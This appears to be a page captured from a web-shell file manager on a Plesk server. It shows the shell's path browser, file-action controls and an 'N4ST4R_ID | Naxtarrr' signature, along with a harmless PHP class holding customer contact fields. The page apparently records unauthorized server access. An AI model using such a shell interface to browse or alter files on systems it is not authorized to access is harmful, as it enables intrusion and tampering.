Submit
Path:
~
/
/
proc
/
self
/
root
/
opt
/
psa
/
admin
/
plib
/
modules
/
git
/
vendor
/
plesk
/
api-php-lib
/
src
/
Api
/
Struct
/
Customer
/
File Content:
GeneralInfo.php
<?php // Copyright 1999-2021. Plesk International GmbH. namespace PleskX\Api\Struct\Customer; class GeneralInfo extends \PleskX\Api\Struct { /** @var string */ public $company; /** @var string */ public $personalName; /** @var string */ public $login; /** @var string */ public $guid; /** @var string */ public $email; /** @var string */ public $phone; /** @var string */ public $fax; /** @var string */ public $address; /** @var string */ public $postalCode; /** @var string */ public $city; /** @var string */ public $state; /** @var string */ public $country; /** @var string */ public $description; /** @var string */ public $externalId; public function __construct($apiResponse) { $this->_initScalarProperties($apiResponse, [ ['cname' => 'company'], ['pname' => 'personalName'], 'login', 'guid', 'email', 'phone', 'fax', 'address', ['pcode' => 'postalCode'], 'city', 'state', 'country', 'external-id', 'description', ]); } }
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
GeneralInfo.php
1254 bytes
0644
Info.php
378 bytes
0644
N4ST4R_ID | Naxtarrr